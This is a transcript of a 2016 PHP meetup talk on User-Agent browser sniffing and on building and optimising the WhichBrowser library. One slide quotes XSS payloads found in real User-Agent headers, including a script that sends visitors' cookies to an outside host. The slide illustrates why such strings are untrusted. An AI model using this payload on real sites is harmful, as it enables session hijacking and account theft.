Everybody Lies – The story behind WhichBrowser

A presentation at GroningenPHP in April 2016 in Groningen, Netherlands by Niels Leenheer

Slide 1

everybody lies

GroningenPHP, April 7th 2016

Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

1 Browser sniffing explained

Slide 7

why a talk about browser sniffing?

Slide 8

browser sniffing is dirty

Slide 9

you should use feature detection

Slide 10

why a talk about browser sniffing?

Slide 11

Slide 12

what is browser sniffing?

Slide 13

The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

Slide 14

Every request the browser makes to the server includes the User-Agent header

Slide 15

    GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

Slide 16

    GET http://whichbrowser.net/ HTTP/1.1
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: en-us
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
    Host: whichbrowser.net

    HTTP/1.1 200 OK
    Date: Mon, 08 Feb 2016 10:40:28 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT
    ETag: "984-50cae11796432"
    Accept-Ranges: bytes
    Content-Length: 2436
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8

    <!doctype html>
    <html>

Slide 17

You can use the User-Agent string to identify:

- the browser
- the rendering engine
- the operating system
- the device model
- and more
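
As a minimal sketch of what sniffing means in practice, the following PHP pulls the browser and operating system tokens out of the Internet Explorer string from the request shown earlier. The function name `naiveSniff` and its two patterns are assumptions made for illustration, not WhichBrowser code. On a real server the string would typically come from `$_SERVER['HTTP_USER_AGENT']`.

```php
<?php
// Hypothetical helper for illustration only; not part of WhichBrowser.
function naiveSniff($ua)
{
    $result = ['browser' => null, 'version' => null, 'os' => null];

    // "MSIE 9.0" is the token older Internet Explorer versions send.
    if (preg_match('/MSIE ([0-9.]+)/', $ua, $match)) {
        $result['browser'] = 'Internet Explorer';
        $result['version'] = $match[1];
    }

    // "Windows NT 6.0" is the platform token.
    if (preg_match('/Windows NT ([0-9.]+)/', $ua, $match)) {
        $result['os'] = 'Windows NT ' . $match[1];
    }

    return $result;
}

$ua = 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)';
print_r(naiveSniff($ua));
```

Two patterns are enough for this one string; they say nothing about any other browser, which is where the trouble starts.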

Slide 18

what is browser sniffing good for?

Slide 19

improve ux

If you know the platform or browser, you can streamline the user experience.

Slide 20

Slide 21

analytics

If you know your users, you can build a better site for them.

Slide 22

error logging

If you know which browser is causing problems, you can fix them.

Slide 23

Slide 24

Slide 25

why is browser sniffing hard?

Slide 26

things started out simple

Slide 27

Mosaic

    Mosaic/1.0 (Win3.1)

- Mosaic: the name of the browser
- 1.0: the version of the browser
- Win3.1: operating system

Slide 28

Netscape Navigator

    Mozilla/1.0 (Win3.1)

- Mozilla: the code name of the browser
- 1.0: the version of the browser
- Win3.1: operating system

Slide 29

but it quickly started to get complicated

Slide 30

Internet Explorer

    Mozilla/1.0 (compatible; MSIE 1.0; Windows 95)

- MSIE: the name of the browser
- Mozilla/1.0 and "compatible": compatible with Netscape Navigator 1.0
- 1.0 (after MSIE): the version of the browser
- Windows 95: operating system

Slide 31

Opera

    Opera/8.54 (Windows 95; U; en)

- Opera: the name of the browser
- 8.54: the version of the browser
- Windows 95: operating system
- en: English language
- U: United States level encryption

Slide 32

Opera

    Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0

- Opera: the name of the browser
- 10.00: the version of the browser
- Presto/2.2.0: rendering engine

Slide 33

Opera

    Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10

- Opera: the name of the browser
- 9.8: fake version of the browser
- Version/10.10: real version of the browser
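
A sniffer has to prefer the trailing `Version/` token over the number after `Opera/` to get the real version. A minimal sketch, assuming only the string layouts shown on these slides (`operaVersion` is a hypothetical name):

```php
<?php
// Hypothetical helper: returns the real version of a Presto-era Opera string.
function operaVersion($ua)
{
    // Later strings carry the real version in a trailing "Version/x.y" token.
    if (preg_match('~Version/([0-9.]+)~', $ua, $match)) {
        return $match[1];
    }
    // Older strings only have the number directly after "Opera/".
    if (preg_match('~^Opera/([0-9.]+)~', $ua, $match)) {
        return $match[1];
    }
    return null;
}

echo operaVersion('Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10'), PHP_EOL; // 10.10
echo operaVersion('Opera/8.54 (Windows 95; U; en)'), PHP_EOL; // 8.54
```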

Slide 34

Firefox

    Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.0.12) Gecko/20090706 Firefox/3.0.12

- Gecko: the name of the rendering engine
- Firefox: the name of the browser
- 20090706: build date of the rendering engine
- 3.0.12: version of the browser
- rv:1.9.0.12: version of the rendering engine

Slide 35

Firefox

    Mozilla/5.0 (Windows NT 6.0; rv:15.0) Gecko/20100101 Firefox/15.0

- 20100101: build date is no longer updated

Slide 36

Firefox

    Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

Slide 37

and it gets worse…

Slide 38

Safari

    Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3

- Safari: the name of the browser
- Version/3.2.3: version of the browser

Slide 39

Chrome

    Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3

- Chrome: the name of the browser
- 15.0.874.120: version of the browser

Slide 40

Opera

    Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180

- OPR: the name of the browser
- 31.0.1889.180: version of the browser

Slide 41

Internet Explorer

    Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko

- rv:11.0: version of the browser

Slide 42

Edge

    Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162

- Edge: the name of the browser
- 12.10162: version of the browser
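
Because each newer browser keeps the tokens of the ones it imitates, the order of the checks decides the answer. The sketch below covers only the four WebKit-style strings from the slides above and tests the most specific token first. `browserName` and its token table are illustrative assumptions, not WhichBrowser's implementation.

```php
<?php
// Hypothetical helper; the order of the token table is the point of the example.
function browserName($ua)
{
    // Most specific first: the Edge and Opera strings also contain "Chrome/",
    // and all four strings contain "Safari/".
    $tokens = [
        'Edge/'   => 'Edge',
        'OPR/'    => 'Opera',
        'Chrome/' => 'Chrome',
        'Safari/' => 'Safari',
    ];
    foreach ($tokens as $token => $name) {
        if (strpos($ua, $token) !== false) {
            return $name;
        }
    }
    return null;
}

$edge = 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) '
      . 'Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162';
echo browserName($edge), PHP_EOL; // Edge
```

Reversing the table would report every one of these browsers as Safari.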

Slide 43

and those were all relatively normal User-Agent strings

Slide 44

“User-Agent strings only get larger over time, never smaller”

Niels’s law of User-Agent strings

Slide 45

Samsung Internet

    Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36

- SAMSUNG GT-I9505: Samsung device
- Version/1.5: version of the browser

Slide 46

Nokia Xpress for Windows Phone

    Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

Slide 47

LG Netcast

    Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+

Slide 48

Sometimes browsers include a compatibility mode or desktop mode, which deliberately changes the User-Agent string

Slide 49

Opera

    Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50

- Opera: the name of the browser
- Linux: the name of the operating system
- 11.50: version of the browser

Slide 50

Opera Mobile (desktop mode)

    Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50

- Opera: the name of the browser
- zbov: ROT 13 encrypted “mobi”
- 11.50: version of the browser
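
The ROT13 claim is easy to check with PHP's built-in `str_rot13()`. The helper `hasHiddenMobileToken` is a hypothetical name used only for this sketch.

```php
<?php
// str_rot13() is its own inverse, so one call both encodes and decodes.
echo str_rot13('zbov'), PHP_EOL; // mobi

// Hypothetical check for the disguised token in a user agent string.
function hasHiddenMobileToken($ua)
{
    return strpos($ua, str_rot13('mobi')) !== false;
}

var_dump(hasHiddenMobileToken('Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50')); // bool(true)
```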

Slide 51

Internet Explorer

    Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)

- MSIE 8.0: browser version

Slide 52

Internet Explorer (compatibility view)

    Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)

- Trident/5.0: Trident 5 means it’s Internet Explorer 9
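
One way to see through compatibility view is to trust the Trident token rather than the MSIE token. The sketch below relies on Trident 4 through 7 having shipped with Internet Explorer 8 through 11, so the offset of 4 is only meant for that range. `realIeVersion` is a hypothetical name.

```php
<?php
// Hypothetical helper: derive the real IE version from the Trident token.
function realIeVersion($ua)
{
    if (preg_match('~Trident/([0-9]+)~', $ua, $match)) {
        // Trident 4 shipped with IE 8, Trident 5 with IE 9, and so on up to IE 11.
        return (int) $match[1] + 4;
    }
    return null; // no Trident token: nothing to correct
}

echo realIeVersion('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)'), PHP_EOL; // 9
```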

Slide 53

And it is possible to change the User-Agent string yourself

Slide 54

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

Slide 55

XSS attacks

    <script>alert("My Little Pony");</script>
    <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script>
    <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony">

Slide 56

XSS attacks
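
Strings like these only do harm when a page prints them back unescaped, for example in an analytics dashboard or an error log viewer. A minimal sketch of the usual defence, treating the header as untrusted input and escaping it on output (`escapeUserAgent` is a hypothetical name):

```php
<?php
// Treat the User-Agent header as untrusted input and escape it on output.
function escapeUserAgent($ua)
{
    return htmlspecialchars($ua, ENT_QUOTES, 'UTF-8');
}

echo escapeUserAgent('<script>alert("My Little Pony");</script>'), PHP_EOL;
// &lt;script&gt;alert(&quot;My Little Pony&quot;);&lt;/script&gt;
```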

Slide 57

funny people

    Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)
    Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°

Slide 58

angry people

Slide 59

angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

Slide 60

User-Agent strings cannot be trusted!

Slide 61

Everybody lies

Slide 62

you should never use browser sniffing for controlling access to your website

Slide 63

you should never use browser sniffing for determining browser capabilities

Slide 64

you should never build your own browser sniffing library

Slide 65

2 Creating my own browser sniffing library

Slide 66

Slide 67

Slide 68

Slide 69

open source

Slide 70

PHP 5.4 and up including PHP 7 and HHVM

Slide 71

12,500 lines of code

Slide 72

100% code coverage

5000+ individual tests

Slide 73

device database with 36,000 entries

Slide 74

psr-1 and psr-2 coding style

Slide 75

psr-4 autoloading

Slide 76

psr-6 caching interface

Slide 77

Slide 78

1 How to maintain quality?

Slide 79

testing of course!

Slide 80

What tools do we use?

Slide 81

PHP CodeSniffer

Slide 82

PHP CodeSniffer

Check if your code follows coding standards

Slide 83

PHPUnit

Slide 84

PHPUnit

Very good for testing the code that defines the public APIs

Slide 85

PHPUnit

But not so good for testing the actual browser detection

Slide 86

Testrunner

Slide 87

Testrunner

Very lean framework for testing browser sniffing

Slide 88

Testrunner

YAML files that contain a list of user agent strings and the expected results

Slide 89

Testrunner

No coding required

Just add a new user agent string and automatically generate the expected results
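
The idea of a data-driven runner can be sketched in a few lines. This is not the actual Testrunner: the cases sit in a PHP array instead of YAML files to keep the example self-contained, and `detectBrowser`, `runCases`, and the case layout are all hypothetical.

```php
<?php
// Hypothetical stand-in for the detection code under test.
function detectBrowser($ua)
{
    if (preg_match('~Firefox/([0-9.]+)~', $ua, $match)) {
        return ['name' => 'Firefox', 'version' => $match[1]];
    }
    return ['name' => null, 'version' => null];
}

// Each case pairs a user agent string with the expected result,
// which is the information the YAML files would hold.
$cases = [
    [
        'ua'     => 'Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0',
        'result' => ['name' => 'Firefox', 'version' => '16.0'],
    ],
    [
        'ua'     => 'Mosaic/1.0 (Win3.1)',
        'result' => ['name' => null, 'version' => null],
    ],
];

// Returns the user agent strings whose actual result differs from the expectation.
function runCases(array $cases, callable $detect)
{
    $failures = [];
    foreach ($cases as $case) {
        if ($detect($case['ua']) !== $case['result']) {
            $failures[] = $case['ua'];
        }
    }
    return $failures;
}

$failures = runCases($cases, 'detectBrowser');
echo count($failures) === 0 ? "all cases pass\n" : implode("\n", $failures) . "\n";
```

Adding a test then means adding data, not code, which is what makes thousands of cases manageable.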

Slide 90

Continuous integration?

Slide 91

Yes, please!

Slide 92

Slide 93

Automatically start up virtual machines that run your whole test suite after every commit

Slide 94

Automatic testing of your code in multiple versions of PHP

Slide 95

Automatic checking of pull requests with feedback directly in GitHub

Slide 96

.travis.yml

    language: php

    php:
      - 5.4
      - 5.5
      - 5.6
      - 7.0
      - hhvm

    before_script:
      - composer self-update
      - composer update --ignore-platform-reqs --prefer-source

    script:
      - vendor/bin/phpcs --standard=PSR1,PSR2 -n src
      - php bin/runner.php --coverage --show check
      - vendor/bin/phpunit --coverage-clover phpunit.xml

    after_script:
      - travis_retry php vendor/bin/coveralls -v

Slide 97

Slide 98

Check if your tests cover all of your source code

Slide 99

Coverage information is generated by PHPUnit and Testrunner

Slide 100

Slide 101

Generating code coverage

Slide 102

Requires Xdebug or phpdbg

Slide 103

Common format is Clover XML

Slide 104

PHPUnit supports generating coverage as Clover XML

    phpunit --coverage-clover phpunit.xml

Slide 105

For Testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML

Slide 106

There is a package for that!

phpunit/php-code-coverage

    composer require phpunit/php-code-coverage

    $coverage = new PHP_CodeCoverage;
    $coverage->filter()->addDirectoryToWhitelist('src');
    $coverage->start('Testrunner');

    // run your tests

    $coverage->stop();

    $writer = new PHP_CodeCoverage_Report_Clover;
    $writer->process($coverage, 'runner.xml');

Slide 107

Slide 108

2 How to make it faster!

Slide 109

profiling of course!

Slide 110

WhichBrowser used to be 4 times slower than its competitors

Slide 111

[Chart: average parsing time (ms) for UA Parser, Piwik, WhichBrowser, WURFL and Browscap]

source: http://thadafinser.github.io/UserAgentParserComparison/

Slide 112

Why?

Slide 113

Use Xdebug and QCacheGrind

Slide 114

Xdebug has an option to create performance profiles

    zend_extension="/usr/local/opt/php70-xdebug/xdebug.so"
    xdebug.profiler_enable=1

Slide 115

View performance profiles in QCacheGrind

Slide 116

Slide 117

Slide 118

65% of time was spent in DeviceModels::identify()

Slide 119

65% of time was spent looking through the device database

Slide 120

65% of time was spent iterating over huge arrays

Slide 121

    DeviceModels::$ANDROID_MODELS = [
        …
        'GT-I92(20|28)!'       => [ 'Samsung', 'Galaxy Note' ],
        'GT-I92(30|35)!'       => [ 'Samsung', 'Galaxy Golden' ],
        'GT-I9250'             => [ 'Samsung', 'Galaxy Nexus' ],
        'GT-I92(60|68)!'       => [ 'Samsung', 'Galaxy Premier' ],
        'GT-I9295'             => [ 'Samsung', 'Galaxy S4 Active' ],
        'GT-I93(00|03|05|08)!' => [ 'Samsung', 'Galaxy S III' ],
        'GT-I93(01)!'          => [ 'Samsung', 'Galaxy S3 Neo' ],
        'GT-I95(00|05|07)!'    => [ 'Samsung', 'Galaxy S4' ],
        'GT-I95(02|08)!'       => [ 'Samsung', 'Galaxy S4 Duos' ],
        'GT-I95(06)!'          => [ 'Samsung', 'Galaxy S4 Advance' ],
        …
    ];

Slide 122

'GT-I93(00|03|05|08)!'

Slide 123

"/^GT-I93(00|03|05|08)/i"

Slide 124

Why not a real database?

Slide 125

Easy editing, easy deployment

Slide 126

Order in the file matters

Slide 127

Why a PHP file?

Slide 128

No need to parse JSON or YAML

Slide 129

The whole database can be cached by the opcode cache

Slide 130

But you do need to iterate over every single item in that array until you have a match
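
The lookup described so far can be sketched as a linear scan. It assumes, based only on the slides above, that a trailing `!` marks a key as a pattern that becomes an anchored, case-insensitive regular expression, and that other keys are compared literally. The three-entry array and the names `keyMatches` and `identifyModel` are hypothetical.

```php
<?php
// Hypothetical miniature of the device database.
$models = [
    'GT-I9250'             => ['Samsung', 'Galaxy Nexus'],
    'GT-I93(00|03|05|08)!' => ['Samsung', 'Galaxy S III'],
    'GT-I95(00|05|07)!'    => ['Samsung', 'Galaxy S4'],
];

// Assumption inferred from the slides: a trailing "!" marks a key as a pattern.
function keyMatches($key, $model)
{
    if (substr($key, -1) !== '!') {
        return $key === $model; // plain key: literal comparison
    }
    // Strip the marker, anchor at the start, match case-insensitively.
    return preg_match('/^' . rtrim($key, '!') . '/i', $model) === 1;
}

// Linear scan: every entry is tried in file order until one matches.
function identifyModel(array $models, $model)
{
    foreach ($models as $key => $device) {
        if (keyMatches((string) $key, $model)) {
            return $device;
        }
    }
    return null;
}

print_r(identifyModel($models, 'GT-I9505'));
```

With three entries the scan is instant; with tens of thousands, a model near the end of the file pays for a `preg_match` call on almost every entry before it.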

Slide 131

Why not create an index?

Slide 132

You can’t create an index for regular expressions :-(

Slide 133

Or can you?

Slide 134

No, you can’t!

Slide 135

If only we could determine all possible matches for a regular expression…

Slide 136

1 All regular expressions are fixed to the start of the string

Slide 137

2 The shorter the index, the easier it is to find the matching strings

Slide 138

The ideal index length was 2 or 3 characters

Slide 139

We can do that!

Slide 140

    /^GT-I93(00|03|05|08)/i  →  GT

Slide 141

    /^(SHP-)?(SHARP )?SH[0-9]{2,3}/i  →  SH

Slide 142

    /^(MEDION|(MD )?LIFETAB)/i  →  ME, MD, LI

Slide 143

    /^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i  →  LE, ID, K0, K1, K2, K3, K4, K…

Slide 144

    /^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i  →  LE, ID, “complex list”

Slide 145

Can we do this in PHP?

Slide 146

There is a package for that!

icomefromthenet/reverse-regex

    composer require icomefromthenet/reverse-regex

    use ReverseRegex\Lexer;

    $lexer = new Lexer($regexp);
    $lexer->moveNext();

    if ($lexer->isNextTokenAny([ Lexer::T_LITERAL_CHAR, Lexer::T_LITERAL_NUMERIC ])) {
        …
    }
    else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) {
        …
    }
    else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) {
        …
    }
    else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) {
        …

Slide 147

Generate keys from a regular expression in just 100 lines of code

Slide 148

    DeviceModels::$ANDROID_INDEX = [
        …
        '@HW' => array (
            0 => '(HW-|HUAWEI )?(TIT|TAG)!!',
            1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!',
            2 => '(HW-|HUAWEI )?(CHC|KII)!!',
            3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!',
            4 => '(Huawei|Ascend|HW-)!!',
            5 => 'HW-01E',
            6 => 'HW-03E',
        ),
        …
    ];

Slide 149

Looking up an Android device (without index)

    1 ✕         foreach ($data as $item)
    15,000 ✕    preg_match($item, $model) or $item === $model
    1 ✕         return $item

Slide 150

Looking up an Android device (with index)

    1 ✕         $i = $index[substr($model, 0, 2)]
    1 ✕         foreach ($i as $item)
    1 - 100 ✕   preg_match($item, $model) or $item === $model
    1 ✕         return $data[$item]
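
A runnable sketch of the indexed lookup follows. The `@` prefix on index keys is taken from the `$ANDROID_INDEX` slide; the upper-casing of the prefix, the miniature data, and the function name `lookupModel` are assumptions made for this example.

```php
<?php
// Hypothetical miniature of the database and its two-character index.
$data = [
    'GT-I9250'             => ['Samsung', 'Galaxy Nexus'],
    'GT-I93(00|03|05|08)!' => ['Samsung', 'Galaxy S III'],
    'GT-I95(00|05|07)!'    => ['Samsung', 'Galaxy S4'],
    'HW-01E'               => ['Huawei', 'HW-01E'],
];
$index = [
    '@GT' => ['GT-I9250', 'GT-I93(00|03|05|08)!', 'GT-I95(00|05|07)!'],
    '@HW' => ['HW-01E'],
];

function lookupModel(array $data, array $index, $model)
{
    // One array access selects the short candidate list for this prefix.
    $prefix = '@' . strtoupper(substr($model, 0, 2));
    if (!isset($index[$prefix])) {
        return null;
    }
    foreach ($index[$prefix] as $item) {
        if (substr($item, -1) === '!') {
            // Pattern key: anchored, case-insensitive regular expression.
            $matched = preg_match('/^' . rtrim($item, '!') . '/i', $model) === 1;
        } else {
            // Plain key: literal comparison.
            $matched = $item === $model;
        }
        if ($matched) {
            return $data[$item];
        }
    }
    return null;
}

print_r(lookupModel($data, $index, 'GT-I9300'));
```

The regular expressions are unchanged; the gain comes purely from running far fewer of them per lookup.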

Slide 151

Slide 152

Slide 153

[Chart: average parsing time (ms) for UA Parser, Piwik, WhichBrowser, WURFL and Browscap]

source: http://thadafinser.github.io/UserAgentParserComparison/

Slide 154

But wait…

Slide 155

Slide 156

Slide 157

Again lists of regular expressions, but with no possible way to create an index

Slide 158

Multiple calls to preg_match with simple regular expressions

Slide 159

    if (preg_match('/Nintendo Wii/u', $ua)) { … }
    if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
    if (preg_match('/PlayStation Vita/u', $ua)) { … }
    if (preg_match('/PlayStation 4/u', $ua)) { … }
    if (preg_match('/Xbox One/u', $ua)) { …

Slide 160

preg_match is fast

Slide 161

But it has a bit of overhead

Slide 162

Replace multiple calls with a single call to reduce overhead

Slide 163

    if (preg_match('/Nintendo Wii/u', $ua)) { … }
    if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
    if (preg_match('/PlayStation Vita/u', $ua)) { … }
    if (preg_match('/PlayStation 4/u', $ua)) { … }
    if (preg_match('/Xbox One/u', $ua)) { …

Slide 164

    if (preg_match('/Nintendo Wii/u', $ua)) { … }
    if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
    if (preg_match('/PlayStation Vita/u', $ua)) { … }
    if (preg_match('/PlayStation 4/u', $ua)) { …

Slide 165

    if (!preg_match('/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui', $ua)) {
        return;
    }

    if (preg_match('/Nintendo Wii/u', $ua)) { … }
    if (preg_match('/Nintendo Wii ?U/u', $ua)) { … }
    if (preg_match('/PlayStation Vita/u', $ua)) { … }
    if (preg_match('/PlayStation 4/u', $ua)) { …

Slide 166

We still do the individual checks, but only if we are certain there is a match
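
Put together, the gate pattern looks roughly like this. The patterns are copied from the slides; the function name `detectConsole`, the early returns, and the placement of the Wii U check ahead of the Wii check are choices made for this sketch, not a description of WhichBrowser's code.

```php
<?php
// Hypothetical function; the patterns come from the slides above.
function detectConsole($ua)
{
    // One combined check rejects most user agents with a single call.
    if (!preg_match('/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui', $ua)) {
        return null;
    }

    // Only candidates reach the individual checks. The more specific
    // "Wii U" pattern goes first so it is not reported as "Wii".
    $patterns = [
        '/Nintendo Wii ?U/u'  => 'Wii U',
        '/Nintendo Wii/u'     => 'Wii',
        '/PlayStation Vita/u' => 'PlayStation Vita',
        '/PlayStation 4/u'    => 'PlayStation 4',
        '/Xbox One/u'         => 'Xbox One',
    ];
    foreach ($patterns as $pattern => $name) {
        if (preg_match($pattern, $ua)) {
            return $name;
        }
    }
    return null;
}

// A desktop Firefox string fails the gate after a single preg_match call.
var_dump(detectConsole('Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0')); // NULL
```

The common case, a browser that is not a console, now costs one call instead of one per console.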

Slide 167

Slide 168

Slide 169

[Chart: average parsing time (ms) for UA Parser, Piwik, WhichBrowser, WURFL and Browscap]

source: http://thadafinser.github.io/UserAgentParserComparison/

Slide 170

On par with others, but with a massive device database

Slide 171

Slide 172

3 How to make it even faster

Slide 173

3 How to make it even faster-der!

Slide 174

caching of course!

Slide 175

A common use case of WhichBrowser is to call it from every page of your website

Slide 176

Instead of analysing every page view you can do it once and reuse that result
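
The principle fits in a few lines. In this sketch a plain PHP array stands in for the cache, which only lives for one request; a real setup needs a store that survives between requests. `cachedAnalyse` and the placeholder `$analyse` callback are hypothetical.

```php
<?php
// Hypothetical wrapper: $analyse stands in for the expensive parsing step.
function cachedAnalyse(array &$cache, $ua, callable $analyse)
{
    $id = md5($ua); // identical strings map to the same cache entry
    if (!array_key_exists($id, $cache)) {
        $cache[$id] = $analyse($ua); // parse only on a cache miss
    }
    return $cache[$id];
}

$calls = 0;
$analyse = function ($ua) use (&$calls) {
    $calls++;
    return strtoupper($ua); // placeholder for a real analysis result
};

$cache = [];
cachedAnalyse($cache, 'Mosaic/1.0 (Win3.1)', $analyse);
cachedAnalyse($cache, 'Mosaic/1.0 (Win3.1)', $analyse);
echo $calls, PHP_EOL; // 1
```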

Slide 177

- memcached
- redis
- xcache
- couchbase
- apc
- mongodb
- filesystem
- zend data cache
- wincache

Slide 178

A universal caching API

Slide 179

PSR-6

Slide 180

Memcached

    // Initialise the Memcached client
    $client = new \Memcached();
    $client->addServer('localhost', 11211);

    // Retrieve our data
    $data = $client->get($id);

    if ($client->getResultCode() === Memcached::RES_NOTFOUND) {
        $data = …
        $client->set($id, $data);
    }

Slide 181

Memcached using a PSR-6 cache adapter

    // Initialise the Memcached client
    $client = new \Memcached();
    $client->addServer('localhost', 11211);

    // Initialise our storage pool
    $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client);

    // Retrieve our data
    $item = $pool->getItem($id);

    if ($item->isHit()) {
        $data = $item->get();
    } else {
        $data = …
        $item->set($data);
        $pool->save($item);
    }

Slide 182

Redis using a PSR-6 cache adapter

    // Initialise the Redis client
    $client = new \Redis();
    $client->connect('localhost', 6379);

    // Initialise our storage pool
    $pool = new \Cache\Adapter\Redis\RedisCachePool($client);

    // Retrieve our data
    $item = $pool->getItem($id);

    if ($item->isHit()) {
        $data = $item->get();
    } else {
        $data = …
        $item->set($data);
        $pool->save($item);
    }

Slide 183

Install adapters for the storage method you want

Slide 184

Set up the storage pool and give it to WhichBrowser

Slide 185

WhichBrowser without caching

    // Analyse the user agent string
    $result = new WhichBrowser\Parser();
    $result->analyse(getallheaders());

    echo $result->toString();

Slide 186

WhichBrowser with Memcached caching

    // Initialise the Memcached client
    $client = new \Memcached();
    $client->addServer('localhost', 11211);

    // Initialise our storage pool
    $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client);

    // Analyse the user agent string
    $result = new WhichBrowser\Parser();
    $result->setCache($pool);
    $result->analyse(getallheaders());

    echo $result->toString();

Slide 187

Just 50 lines of code

Slide 188

Slide 189

1 Test everything!

2 Profile everything!

3 Cache everything!

Slide 190

4 Never, ever create your own browser sniffing library

Slide 191

Thank you!

Slide 192

Thank you!